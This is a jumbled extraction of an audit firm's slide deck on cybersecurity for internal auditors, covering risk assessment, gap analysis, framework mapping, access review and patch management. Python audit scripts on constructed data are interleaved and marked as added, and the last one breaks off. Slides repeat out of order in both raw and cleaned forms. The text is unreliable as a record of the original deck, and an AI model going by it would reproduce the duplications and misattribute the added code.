25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
• Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems. Don't just think SOX
• Confirm IT is not using privileged accounts for daily tasks, which can include browsing the internet or answering email
• Determine whether privileged and admin account passwords are held to a higher standard than normal accounts (complexity, length, change frequency, sharing)
• Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
• Companies often fail to implement basic end user training around cybersecurity. Often the uneducated or untrained end user is the cyber attacker's first entry point into the company
• Determine whether your company conducts random phishing awareness training campaigns
• Evaluate your company's overall cybersecurity training and awareness program
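The access checks above, as an added example that is not part of the presentation: a short Python script an auditor could run over an account export to (1) diff privileged group membership between two reviews, which is the change IT should be alerting on, (2) test privileged and standard passwords against different maximum-age standards, and (3) flag privileged accounts that also carry a mailbox or web-proxy traffic, a sign the account is used for routine work. The export fields, the group names, the 60/90-day standards and every record are assumptions made for the example.

```python
"""Added example (not from the presentation): audit tests over a constructed
account export for the deck's privileged-access checks.  Field names, group
names, the password-age standards and every record are assumptions."""
from datetime import date

# Assumed standards: privileged passwords rotate within 60 days, standard within 90.
MAX_PASSWORD_AGE_DAYS = {"privileged": 60, "standard": 90}
# Groups treated as elevated (assumption; tailor to the environment under review).
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Server Operators"}
TODAY = date(2018, 9, 30)  # review date for the constructed data


def is_privileged(account):
    return bool(PRIVILEGED_GROUPS & set(account["groups"]))


def privilege_changes(previous, current):
    """Diff two membership snapshots (last review vs today's export) and report
    who gained or lost elevated groups -- the change IT should be alerted on."""
    prev = {a["name"]: set(a["groups"]) & PRIVILEGED_GROUPS for a in previous}
    curr = {a["name"]: set(a["groups"]) & PRIVILEGED_GROUPS for a in current}
    gained, lost = {}, {}
    for name in prev.keys() | curr.keys():
        added = curr.get(name, set()) - prev.get(name, set())
        removed = prev.get(name, set()) - curr.get(name, set())
        if added:
            gained[name] = sorted(added)
        if removed:
            lost[name] = sorted(removed)
    return gained, lost


def stale_passwords(accounts, today=TODAY):
    """Accounts whose password age exceeds the standard for their tier, so
    privileged accounts are held to the stricter limit."""
    findings = []
    for a in accounts:
        tier = "privileged" if is_privileged(a) else "standard"
        age = (today - a["pwd_last_set"]).days
        if age > MAX_PASSWORD_AGE_DAYS[tier]:
            findings.append((a["name"], tier, age))
    return findings


def admins_used_for_daily_work(accounts):
    """Privileged accounts that also own a mailbox or show web-proxy traffic:
    a proxy (assumption) for admin credentials being used for email and browsing."""
    return sorted(a["name"] for a in accounts
                  if is_privileged(a) and (a["has_mailbox"] or a["web_proxy_hits"] > 0))


# Constructed snapshots.  PREVIOUS is last month's membership list; CURRENT is
# today's export with password and usage attributes.
PREVIOUS = [
    {"name": "jdoe", "groups": ["Domain Users"]},
    {"name": "jdoe-adm", "groups": ["Domain Admins"]},
    {"name": "svc-backup", "groups": ["Server Operators"]},
    {"name": "msmith", "groups": ["Domain Users"]},
]
CURRENT = [
    {"name": "jdoe", "groups": ["Domain Users", "Domain Admins"],
     "pwd_last_set": date(2018, 8, 1), "has_mailbox": True, "web_proxy_hits": 410},
    {"name": "jdoe-adm", "groups": ["Domain Admins"],
     "pwd_last_set": date(2018, 5, 15), "has_mailbox": False, "web_proxy_hits": 0},
    {"name": "svc-backup", "groups": ["Domain Users"],
     "pwd_last_set": date(2017, 1, 10), "has_mailbox": False, "web_proxy_hits": 0},
    {"name": "msmith", "groups": ["Domain Users"],
     "pwd_last_set": date(2018, 7, 20), "has_mailbox": True, "web_proxy_hits": 980},
    {"name": "tmp-contractor", "groups": ["Enterprise Admins"],
     "pwd_last_set": date(2018, 9, 25), "has_mailbox": True, "web_proxy_hits": 12},
]

if __name__ == "__main__":
    gained, lost = privilege_changes(PREVIOUS, CURRENT)
    print("gained elevated groups:", gained)
    print("lost elevated groups:", lost)
    print("password age over standard:", stale_passwords(CURRENT))
    print("admin accounts used for daily work:", admins_used_for_daily_work(CURRENT))
```

On the constructed data the diff shows a daily-use account (jdoe) and a new account (tmp-contractor) gaining elevated groups since the last review, the dedicated admin account jdoe-adm failing the stricter 60-day standard, and two privileged accounts with mailboxes and browsing history. Each of those is a question for IT, not a conclusion; the value of the script is that it turns the three interview questions on the slide into repeatable tests over exports.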
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management
• Most companies fail to implement sound patch management processes and procedures, which includes:
• 99% of exploited vulnerabilities were compromised more than a year after the patch was published
• Companies do not know all of the information devices in their network and are therefore unable to adequately assess their patch management process
• Ensure your IT department is scanning all assets continuously so that newly discovered vulnerabilities are identified quickly
• Validate that the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor. This includes workstations, servers, network equipment, VMware, Citrix, non-Microsoft software, etc.
• If known vulnerabilities cannot be patched due to business reasons, determine whether those risks are formally accepted and tracked by management. Assess whether there are sufficient mitigating controls in place
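An added example (not from the presentation) of how the vulnerability-management checks above can be tested with data rather than interviews: reconcile the scanner's discovered hosts against the asset inventory (devices the company does not know it has), compute how long each installed version has trailed the vendor's latest release against a patch SLA that is tighter for internet-facing devices, and check whether each overdue item has a current, approved risk acceptance. The column names, SLA values, the risk-acceptance register and every row are constructed for the example.

```python
"""Added example (not from the presentation): audit analytics over constructed
exports for the deck's vulnerability-management checks.  Column names, SLA
values, the acceptance register and all rows are assumptions."""
import csv
import io
from datetime import date, datetime

# Assumed patch SLA in days by exposure; the deck only says to focus on
# higher-risk areas such as internet-facing devices.
PATCH_SLA_DAYS = {"internet-facing": 30, "internal": 60}
TODAY = date(2018, 9, 30)  # review date for the constructed data

# Constructed inventory export: one row per installed product per device.
INVENTORY_CSV = """\
host,exposure,product,installed,latest,latest_released
web01,internet-facing,Apache HTTP Server,2.4.29,2.4.34,2018-07-15
web01,internet-facing,OpenSSL,1.1.0h,1.1.0i,2018-08-14
vpn01,internet-facing,VPN appliance firmware,9.0.1,9.0.3,2018-08-01
fs01,internal,Windows Server 2012 R2 cumulative update,2018-06,2018-09,2018-09-11
hr01,internal,Java SE,8u171,8u181,2018-07-17
db01,internal,PostgreSQL,10.5,10.5,2018-08-09
"""

# Constructed scanner discovery export: hosts seen on the network.
SCANNER_HOSTS = ["web01", "vpn01", "fs01", "hr01", "db01", "printer-3f", "nas-old"]

# Constructed risk-acceptance register: management sign-off for known gaps.
RISK_ACCEPTANCES = [
    {"host": "hr01", "product": "Java SE", "approved_by": "CIO", "expires": "2018-12-31"},
    {"host": "web01", "product": "Apache HTTP Server", "approved_by": "IT Director", "expires": "2018-09-01"},
    {"host": "web01", "product": "OpenSSL", "approved_by": "", "expires": "2019-03-31"},
]


def parse_inventory(text):
    return list(csv.DictReader(io.StringIO(text)))


def unknown_devices(inventory, scanner_hosts):
    """Hosts the scanner found that the asset inventory does not know about."""
    known = {row["host"] for row in inventory}
    return sorted(h for h in scanner_hosts if h not in known)


def patch_findings(inventory, today=TODAY):
    """Installed-vs-latest gaps that have been open longer than the SLA for
    the device's exposure.  Up-to-date rows and gaps still inside the SLA
    are not findings."""
    findings = []
    for row in inventory:
        if row["installed"] == row["latest"]:
            continue
        released = datetime.strptime(row["latest_released"], "%Y-%m-%d").date()
        age = (today - released).days
        sla = PATCH_SLA_DAYS[row["exposure"]]
        if age > sla:
            findings.append({"host": row["host"], "product": row["product"],
                             "days_unpatched": age, "sla_days": sla})
    return findings


def acceptance_status(finding, acceptances, today=TODAY):
    """'accepted' only when a matching acceptance is approved and unexpired;
    otherwise say why the acceptance does not count."""
    for acc in acceptances:
        if acc["host"] == finding["host"] and acc["product"] == finding["product"]:
            if not acc["approved_by"]:
                return "acceptance on file but not approved"
            if datetime.strptime(acc["expires"], "%Y-%m-%d").date() < today:
                return "acceptance expired"
            return "accepted"
    return "no risk acceptance"


def review(inventory_csv, scanner_hosts, acceptances, today=TODAY):
    inventory = parse_inventory(inventory_csv)
    findings = patch_findings(inventory, today)
    for finding in findings:
        finding["status"] = acceptance_status(finding, acceptances, today)
    return {"unknown_devices": unknown_devices(inventory, scanner_hosts),
            "findings": findings}


if __name__ == "__main__":
    result = review(INVENTORY_CSV, SCANNER_HOSTS, RISK_ACCEPTANCES)
    print("devices seen by the scanner but missing from inventory:", result["unknown_devices"])
    for f in result["findings"]:
        print(f"{f['host']:6} {f['product']:40} {f['days_unpatched']:4d} days "
              f"(SLA {f['sla_days']}) -> {f['status']}")
```

The reconciliation step comes first on purpose: a patch metric computed only over the inventory says nothing about the two hosts the scanner found that nobody has registered. The acceptance check distinguishes an item that management has formally accepted from one that merely has a stale or unsigned entry in the register, which is the difference the last bullet on the slide asks the auditor to draw.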
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANY
• Obtain a basic understanding of your critical information assets, where they are stored and how they are protected
• Perform an inventory of IT devices and assess each device's risk relating to patches
• Understand your company's fundamental process around patch management and focus on higher-risk areas such as internet-facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems)
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password levels and parameters are adequate (password length, characters and change interval)
• Implement a continual end user training program
• Ensure backups and recovery plans work as intended and are properly segregated
• Understand the coverage and terms of your company's cyber insurance policy
• Assess the requirement for multi-factor authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco, Principal | mobile: (918) 625-8870
davidlosacco@stinnett-associates.com
Stinnett & Associates | stinnett-associates.com
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
31
AND MULTI-FACTOR AUTHENTICATION
• Google has not had any of its 85,000+ employees successfully phished on their work-related accounts since early 2017, when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
• Office 365 and other cloud-based services should all use multi-factor authentication
32
Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a cyber breach
The main reasons for companies' struggles are:
BARRIERS TO EFFECTIVE CYBERSECURITY
• Lack of skilled resources (people and time)
• Lack of funds
• Continued innovations in technology
• Expansion of the attack surface
• Lack of understanding of the company's information assets and their value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
33
A Defense-in-Depth approach to cybersecurity is a layered approach that recognizes a company's first line of defense may fail, and integrates multiple layers of defense around a company's information assets. Also called the Castle Approach (once you breach the walls, more defenses are in place)
DEFENSE IN-DEPTH APPROACH
• Patch Management
• Operating System EOL
• Network Vulnerability Scanning
• Security Staffing
• Internal & External Network Boundaries
• Wireless Security
• Firewall Implementation and Monitoring (including NextGen)
• IPS / IDS / SIEM Implementations
• Firewall Dataflow & Standards Documentation
• Cloud Service Provider Evaluations
• Security Incident Management
• Physical Security
• Evaluation of Encryption Technologies
• Network Access Control
• Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE | TECHNOLOGY | PROCESSES
THE PEOPLE CHALLENGE: Humans remain one of the weakest links in the security chain. Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGE: The increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGE: Ensure best-practice processes and associated management frameworks are in place. Regular audits and reviews are important
35
Step 1 - Identify risks through a formal risk assessment of assets
Step 2 - Perform a baseline gap analysis of the current control environment against industry-standard frameworks and identify the controls which need to be implemented to reduce the risk of cybersecurity incidents affecting critical data assets
Step 3 - Make recommendations on the implementation and ongoing management of cybersecurity controls
Step 4 - Perform follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
[Cycle diagram: Risk Assessments → Create a Baseline/Gap Analysis → Implement and Manage Controls → Assess & Report → repeat]
36
• Perform risk assessments to understand the organizational risk and where high-risk assets exist
• The risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
• Work with IT to classify each of the asset types to assist in measuring the overall risk of a cybersecurity event
• Consider using a threat modeling tool to semi-qualitatively measure cybersecurity risks and to identify, estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
[Process diagram: Identification of Assets → Asset Locations → Classification of Assets → Threat Modeling → Calculated Risk Results]
Key to an effective cybersecurity program is to understand the Company's information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
• What Value Do the Assets Have?
• Credit Card Data
• Employee or Customer Records
• Bank Accounts
• Intellectual Property
• Trade Secrets
• Insider Knowledge
• Data Location
• Cash In / Cash Out Processes
• Who Would Want the Data?
37
38
• Through formal risk assessments with all critical functions in the business, identify where data lives and how the data should be classified, then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring. This allows you to determine which critical data assets in your environment are most at risk of a cybersecurity incident
• Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
[Example screenshot of a critical data asset risk assessment – image not reproduced in the extracted text]
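An added example, not from the presentation, in Python: a toy risk register of the kind Step 1 produces (systems, critical data assets, classification, threats, calculated risk) run through the Step 3 controls analysis (identify the information systems with a calculated risk over 100, the specific threats over 100 on each, the mitigating controls for those threats, and the total of instances where each control reduces risk). The classification weights, the impact x likelihood x exposure formula, the threshold's placement and every asset, threat and control name are assumptions; the deck does not publish its scoring model, only the "> 100" cut-off.

```python
"""Added example (not from the presentation): toy Step 1 calculated-risk
results feeding the Step 3 mitigating-control count.  Every system, data
asset, threat, scale and control name below is constructed."""
from collections import Counter
from dataclasses import dataclass

# Assumed semi-quantitative scales; the deck does not publish its own.
IMPACT = {"public": 1, "internal": 3, "confidential": 6, "restricted": 10}
THRESHOLD = 100  # the deck's cut-off: calculated cybersecurity risk > 100


@dataclass(frozen=True)
class Asset:
    system: str          # information system that holds the data
    data: str            # critical data asset type named in business interviews
    classification: str  # agreed with IT during Step 1
    exposure: int        # 1-10, how reachable the system is (assumption)


@dataclass(frozen=True)
class Threat:
    name: str
    likelihood: int      # 1-10 (assumption)
    controls: tuple      # mitigating controls that reduce this threat


def calculated_risk(asset, threat):
    """Assumed formula: impact x likelihood x exposure, range 1..1000."""
    return IMPACT[asset.classification] * threat.likelihood * asset.exposure


def controls_analysis(assets, threats, threshold=THRESHOLD):
    """Steps A-D of the deck's controls analysis.
    Returns (in_scope, control_counts) where
      in_scope: system -> {threat name: highest calculated risk over threshold}
      control_counts: control -> number of (system, threat) pairs it reduces."""
    in_scope = {}
    for asset in assets:
        for threat in threats:
            risk = calculated_risk(asset, threat)
            if risk > threshold:                                   # steps A and B
                per_system = in_scope.setdefault(asset.system, {})
                per_system[threat.name] = max(per_system.get(threat.name, 0), risk)
    by_name = {t.name: t for t in threats}
    control_counts = Counter()
    for threat_risks in in_scope.values():
        for threat_name in threat_risks:
            for control in by_name[threat_name].controls:          # step C
                control_counts[control] += 1                       # step D
    return in_scope, control_counts


def prioritize(control_counts):
    """Controls ordered by how many over-threshold pairs they reduce (ties by name)."""
    return sorted(control_counts.items(), key=lambda kv: (-kv[1], kv[0]))


# Constructed risk register (the Step 1 output this example assumes)
ASSETS = [
    Asset("ERP", "bank account numbers", "restricted", 2),
    Asset("ERP", "vendor master data", "confidential", 2),
    Asset("HR portal", "employee records", "confidential", 5),
    Asset("Intranet wiki", "internal memos", "internal", 2),
    Asset("Marketing site", "press releases", "public", 8),
]
THREATS = [
    Threat("phishing / credential theft", 7, ("MFA", "security awareness training")),
    Threat("unpatched internet-facing service", 5, ("vulnerability scanning", "patch management")),
    Threat("ransomware", 4, ("endpoint protection", "offline backups", "patch management")),
    Threat("insider misuse", 3, ("least-privilege access review", "privileged activity logging")),
]

if __name__ == "__main__":
    in_scope, counts = controls_analysis(ASSETS, THREATS)
    for system, risks in in_scope.items():
        print(system, risks)
    for control, n in prioritize(counts):
        print(f"{n:2d}  {control}")
```

Two details of the toy data are worth noticing. The ERP's "unpatched service" score lands exactly on 100 and is excluded, because the deck's test is strictly "over 100"; a register that uses "100 or more" would count it, so the auditor should confirm which rule the threat-modeling tool applies. And "patch management" reaches a count of 2 by reducing two different threats on one system, which is exactly the effect the per-control total in step D is meant to surface: a control that shows up under several threats earns a higher place on the implementation roadmap than its position under any one threat suggests.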
• Perform walkthroughs with the information technology department to understand the cybersecurity controls in place
• Evaluate control design as it relates to commonly accepted framework(s)
• Identify control gaps and create a baseline for cybersecurity maturity in the organization
• Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize the controls to implement, including the highest-priority, most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
CYBERSECURITY DEFENSE IN-DEPTH
People / Technology / Processes
THE PEOPLE CHALLENGE: Humans remain one of the weakest links in the security chain. Ensure you have a strong security awareness training program.
THE TECHNOLOGY CHALLENGE: The increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential.
THE PROCESS CHALLENGE: Ensure best-practice processes and associated management frameworks are in place. Regular audits and reviews are important.
WHERE AUDIT CAN HELP
Cycle: Risk Assessments, Create a Baseline/Gap Analysis, Implement and Manage Controls, Assess & Report, then repeat
Step 1 - Identify risks through a formal risk assessment of assets
Step 2 - Perform a baseline gap analysis of the current control environment against industry-standard frameworks and identify the controls which need to be implemented to reduce the risk of cybersecurity incidents affecting critical data assets
Step 3 - Make recommendations on the implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Process: Identification of Assets, Asset Locations, Classification of Assets, Threat Modeling, Calculated Risk Results
• Perform risk assessments to understand the organizational risk and where high-risk assets exist
• The risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
• Work with IT to classify each of the asset types to assist in measuring the overall risk of a cybersecurity event
• Consider using a threat modeling tool to semi-quantitatively measure cybersecurity risks, i.e. to identify, estimate and prioritize information security risks
Key to an effective cybersecurity program is understanding the Company's information assets:
• What value do the assets have?
• Credit card data
• Employee or customer records
• Bank accounts
• Intellectual property
• Trade secrets
• Insider knowledge
• Data location
• Cash-in / cash-out processes
• Who would want the data?
• Through formal risk assessments with all critical functions in the business, identify where data lives and how the data should be classified, then perform a threat analysis to semi-quantitatively determine the risk of a particular cybersecurity incident occurring. This allows you to determine the critical data assets in your environment that are most at risk of a cybersecurity incident
• Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
[Example screenshot of a critical data asset risk assessment]
STEP 2 - BASELINE GAP ANALYSIS
• Perform walkthroughs with the information technology department to understand the cybersecurity controls in place
• Evaluate control design as it relates to commonly accepted framework(s)
• Identify control gaps and create a baseline for cybersecurity maturity in the organization
• Use the cybersecurity maturity baseline and the risk assessment results to identify and prioritize the controls to implement, starting with the highest-priority, most impactful controls
• The baseline gap analysis facilitates the identification of the controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
• Work with IT management to identify realistic and feasible mitigating controls and an implementation roadmap
STEP 3 - CONTROLS ANALYSIS
[Chart: mitigating control counts, one bar per candidate control]
How the mitigating control counts were derived:
A) Identify information systems with a calculated cybersecurity risk > 100
B) Does the information system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes/No)? If yes, move to the next step
C) Identify the mitigating controls to implement to address the threat
D) Total all instances where a control reduced risk
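The threat analysis in Step 1 and the control count in Step 3 both rest on a risk score per system and threat, plus a map from each threat to the controls that mitigate it. The following Python is an added example, not part of the original presentation, that carries both steps through on constructed data: the 1-10 likelihood and impact scales, the 1-3 asset value weight, the system, threat and control names and the threat-to-control mapping are all assumptions for illustration.

```python
"""Added example, not from the original presentation: the Step 1 semi-quantitative
threat analysis and the Step 3 mitigating-control count (steps A-D) in code.
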